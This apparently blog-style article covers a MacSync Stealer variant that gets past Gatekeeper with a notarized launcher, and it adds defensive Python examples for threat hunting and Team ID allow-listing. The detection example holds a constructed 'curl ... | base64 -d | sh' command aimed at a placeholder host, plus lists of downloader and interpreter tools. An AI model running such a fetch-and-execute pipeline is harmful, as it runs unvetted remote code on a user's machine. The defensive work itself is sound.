Mac Malware Gets Sneakier, Bypassing Apple’s Protections

According to 9to5Mac, cybersecurity firm Jamf has discovered a new variant of the “increasingly active” MacSync Stealer malware that successfully bypasses Apple’s core security protections. The attack uses a seemingly clean Swift application that is both code-signed and notarized under the Developer ID Team ID GNJLS3UYZ4, so macOS Gatekeeper lets it launch without the usual unidentified-developer warning. Once running, this clean app retrieves an encoded script from a remote server and executes it to install the stealer. The payloads are designed to run primarily in memory, leaving minimal traces on disk. Jamf reported the malicious developer ID to Apple, which has since revoked the certificate. This follows a recent report of attackers using AI chatbots like ChatGPT to trick users into pasting malware-installing commands into Terminal.

The New Playbook

Here’s the thing: Apple‘s notarization system is supposed to be a major line of defense. Notarization is an automated malware scan Apple runs on a submitted binary before issuing it a ticket, and Gatekeeper checks for that ticket and a valid Developer ID signature when the app first launches. But this attack uses a Trojan horse that the gatekeeper willingly lets in. The app Apple scanned contains nothing malicious: it’s a plain Swift launcher with a valid signature, so it passes every automated check. The malicious part is fetched separately, at run time, after the scan is over. It’s a two-stage process that static scanning of the submitted binary can’t catch, because the thing being scanned isn’t the thing that does the damage.
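The practical question for a defender is what that second stage looks like in process telemetry: a signed app bundle spawning a shell that fetches or decodes something and feeds it straight to an interpreter. The following is an added example, not code from Jamf or 9to5Mac. The events are constructed to resemble generic macOS process-execution telemetry (the shape an EDR or an Endpoint Security client might emit); the field names, the Team ID ABCDE12345, the host example.invalid and the command lines are assumptions for illustration, not indicators taken from the reported sample.

```python
"""Hunt for the two-stage pattern: a signed app that pulls and runs an encoded second stage.

Added example, not code from Jamf or 9to5Mac. SAMPLE_EVENTS is constructed
telemetry; the Team ID ABCDE12345, the host example.invalid and the command
lines are illustrative assumptions, not indicators from the reported sample.
"""
import re
from dataclasses import dataclass
from typing import Optional

INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "perl"}
DOWNLOADERS = {"curl", "wget"}
DECODERS = {"base64", "xxd", "openssl"}


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    exe: str                        # path of the executable image
    cmdline: str                    # full command line as executed
    team_id: Optional[str] = None   # signing Team ID of exe, None if unsigned


def program_names(cmdline: str) -> set:
    """Basenames of every path-like token in a command line. Tokenising on
    path characters rather than shell syntax deliberately reaches inside a
    quoted `-c "..."` string, which is where the pipes live."""
    tokens = re.findall(r"[A-Za-z0-9_./-]+", cmdline)
    return {t.rsplit("/", 1)[-1] for t in tokens}


def classify(ev: ProcEvent) -> list:
    """Reasons this single command line looks like staged payload execution."""
    names = program_names(ev.cmdline)
    chained = "|" in ev.cmdline or "$(" in ev.cmdline   # output fed onward
    reasons = []
    if chained and names & DOWNLOADERS and names & INTERPRETERS:
        reasons.append("remote content fed straight to an interpreter")
    if chained and names & DECODERS and names & INTERPRETERS:
        reasons.append("encoded blob decoded and executed without touching disk")
    return reasons


def find_staged_execution(events) -> list:
    """Return findings; severity is raised when the parent is a signed .app,
    since a notarized launcher spawning such a shell is the pattern described."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        reasons = classify(ev)
        if not reasons:
            continue
        parent = by_pid.get(ev.ppid)
        signed_app_parent = bool(parent and parent.team_id
                                 and ".app/Contents/MacOS/" in parent.exe)
        findings.append({
            "pid": ev.pid,
            "parent_exe": parent.exe if parent else None,
            "parent_team_id": parent.team_id if parent else None,
            "severity": "high" if signed_app_parent else "medium",
            "reasons": reasons,
        })
    return findings


# Constructed sample telemetry: one signed launcher spawning a fetch-decode-run
# shell, plus two benign events that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(501, 1, "/Applications/CleanTool.app/Contents/MacOS/CleanTool",
              "/Applications/CleanTool.app/Contents/MacOS/CleanTool", "ABCDE12345"),
    ProcEvent(502, 501, "/bin/sh",
              '/bin/sh -c "curl -fsSL https://example.invalid/s | base64 -d | sh"'),
    ProcEvent(600, 1, "/usr/bin/base64", "base64 -d report.b64"),
    ProcEvent(700, 650, "/bin/zsh", "zsh -c 'ls | wc -l'"),
]

if __name__ == "__main__":
    for finding in find_staged_execution(SAMPLE_EVENTS):
        print(finding)
```

A `curl ... | sh` also fires in a developer’s terminal (the usual one-line installer pattern), which is why the parent context, not the command line alone, drives severity: a GUI app bundle with a Developer ID signature has no business piping remote content into a shell.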

And this isn’t some one-off experiment. Jamf says this reflects a “broader trend” in macOS malware. Attackers are shifting their distribution to look as legitimate as possible. Why bang on the front door when you can walk through it with a genuine, Apple-issued ID that, until someone reports it and Apple revokes it, checks out?

Why This Matters Now

So why is this happening more? Two big reasons. First, Mac market share has grown, making it a more lucrative target. Second, and maybe more importantly, the typical Mac user profile is attractive for financial scams, which is exactly what a credential and wallet stealer is built to feed. The attacks had to evolve because the incentive finally got big enough to justify the cost of a developer account and a clean-looking app.

Remember, the old advice was just “don’t install apps from unidentified developers.” That warning pops up and scares most people off. But what happens when the app is from an “identified” developer? When it’s signed and notarized? That basic, trusty warning never appears. The user’s guard is down. It’s a psychological trick as much as a technical one: the one signal users were trained to rely on is present, and it says everything is fine.

What Can You Do?

The standard advice still applies, but it needs an asterisk. Only install apps from the Mac App Store or directly from developers you know and trust. But even that’s getting trickier. I think we’re entering an era where you need to be skeptical of the source, even if an app looks official. Did you seek it out, or did you click a link somewhere? That distinction is everything.

For businesses managing fleets of Macs, especially in technical fields like manufacturing or industrial automation where specialized software is common, this is a real headache. You can’t just lock everything down to the App Store; sometimes you need to run niche applications. This is where endpoint security and application allow-listing become critical, and the allow-list has to be keyed to developers you have actually vetted (their Team IDs), not to the mere fact that an app is signed and notarized, because this sample was both.
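What a Team-ID-keyed policy looks like in practice, as an added example that is not Jamf’s, Apple’s or any MDM vendor’s code: it parses the report that `codesign -dv --verbose=4` prints for a bundle and decides allow, review or block. The two Team IDs in the allow-list and the three sample reports are constructed placeholders; the only real identifier is GNJLS3UYZ4, the Team ID the article says Apple revoked.

```python
"""Allow-listing by Developer ID Team ID, decided from codesign's own report.

Added example, not Jamf's, Apple's or any MDM vendor's code. The placeholder
Team IDs in ALLOWED_TEAM_IDS and the three `codesign -dv --verbose=4` reports
below are constructed; the only real identifier is GNJLS3UYZ4, which the
article reports Apple revoked.
"""
import re
from typing import Tuple

ALLOWED_TEAM_IDS = {"VNDR000001", "VNDR000002"}   # placeholder: your vetted vendors
REVOKED_TEAM_IDS = {"GNJLS3UYZ4"}                  # from the report; revoked by Apple

# Leaf certificate line, e.g. "Authority=Developer ID Application: Name (TEAMID)"
AUTHORITY_RE = re.compile(r"^Authority=Developer ID Application: .*\(([A-Z0-9]{10})\)$")


def parse_codesign(report: str) -> dict:
    """Extract the fields a policy needs from `codesign -dv --verbose=4`
    output (codesign prints that report on stderr; pass the captured text)."""
    info = {"identifier": None, "team_id": None, "leaf_team": None,
            "hardened_runtime": False, "signed": True}
    for raw in report.splitlines():
        line = raw.strip()
        if "not signed at all" in line:
            info["signed"] = False
        elif line.startswith("Identifier="):
            info["identifier"] = line.split("=", 1)[1]
        elif line.startswith("TeamIdentifier="):
            info["team_id"] = line.split("=", 1)[1]
        elif line.startswith("CodeDirectory") and "(runtime)" in line:
            info["hardened_runtime"] = True      # notarization requires this flag
        else:
            m = AUTHORITY_RE.match(line)
            if m:
                info["leaf_team"] = m.group(1)   # Team ID from the leaf certificate
    return info


def decide(info: dict) -> Tuple[str, str]:
    """Return (verdict, reason). 'notarized' is deliberately not an input:
    the sample in the article was notarized and still malicious."""
    team = info["team_id"]
    if not info["signed"] or team in (None, "not set"):
        return "block", "unsigned or ad-hoc signed; no accountable developer"
    if team in REVOKED_TEAM_IDS:
        return "block", f"Team ID {team} is on the revoked list"
    if info["leaf_team"] and info["leaf_team"] != team:
        return "block", "TeamIdentifier disagrees with the Developer ID leaf certificate"
    if team not in ALLOWED_TEAM_IDS:
        return "review", f"Team ID {team} is valid but not a vetted vendor"
    if not info["hardened_runtime"]:
        return "review", "vetted vendor but hardened runtime is off"
    return "allow", f"Team ID {team} is a vetted vendor"


# Constructed codesign reports (field layout follows the real tool's output).
SAMPLE_VETTED = """
Executable=/Applications/VendorTool.app/Contents/MacOS/VendorTool
Identifier=com.vendor.tool
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=3456 flags=0x10000(runtime) hashes=98+7 location=embedded
Authority=Developer ID Application: Vendor One LLC (VNDR000001)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=VNDR000001
Runtime Version=13.0.0
"""

SAMPLE_REVOKED = """
Executable=/Applications/Launcher.app/Contents/MacOS/Launcher
Identifier=com.example.launcher
Format=app bundle with Mach-O thin (arm64)
CodeDirectory v=20500 size=2048 flags=0x10000(runtime) hashes=60+7 location=embedded
Authority=Developer ID Application: Example Dev (GNJLS3UYZ4)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
TeamIdentifier=GNJLS3UYZ4
"""

SAMPLE_ADHOC = """
Executable=/Users/dev/build/tool
Identifier=tool-55554944abcd
Format=Mach-O thin (arm64)
CodeDirectory v=20400 size=512 flags=0x2(adhoc) hashes=10+2 location=embedded
Signature=adhoc
TeamIdentifier=not set
"""

if __name__ == "__main__":
    for name, report in [("vetted", SAMPLE_VETTED), ("revoked", SAMPLE_REVOKED),
                         ("adhoc", SAMPLE_ADHOC)]:
        print(name, decide(parse_codesign(report)))
```

Two caveats. `codesign -d` only decodes what is embedded in the binary; it does not tell you whether Apple has since revoked the certificate, so feed the policy from a fresh verification pass (`codesign --verify` or `spctl --assess`) as well, not from display output alone. And this script is the decision logic, not the enforcement layer: application-control tools such as Santa take Team ID rules directly, which is where a rule like this belongs on a managed fleet.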

The Bigger Picture

Look, Apple’s security model isn’t broken. The system worked in the end: the certificate was revoked. But there’s a lag between discovery and revocation that attackers exploit, and revocation only stops new launches; it does nothing about a payload that already ran in memory on a machine before the report went in. The cat-and-mouse game is just escalating. Malware is becoming a service, and these slick distribution methods are part of the product.

What’s next? Probably more of this. We’ll see more abused developer accounts, more legitimate-looking wrappers for malicious code. The takeaway isn’t that Macs are suddenly unsafe. It’s that the idea of “Macs don’t get viruses” is truly, completely dead. You need to be aware, just like on any other platform. The era of naive computing is over for everyone.
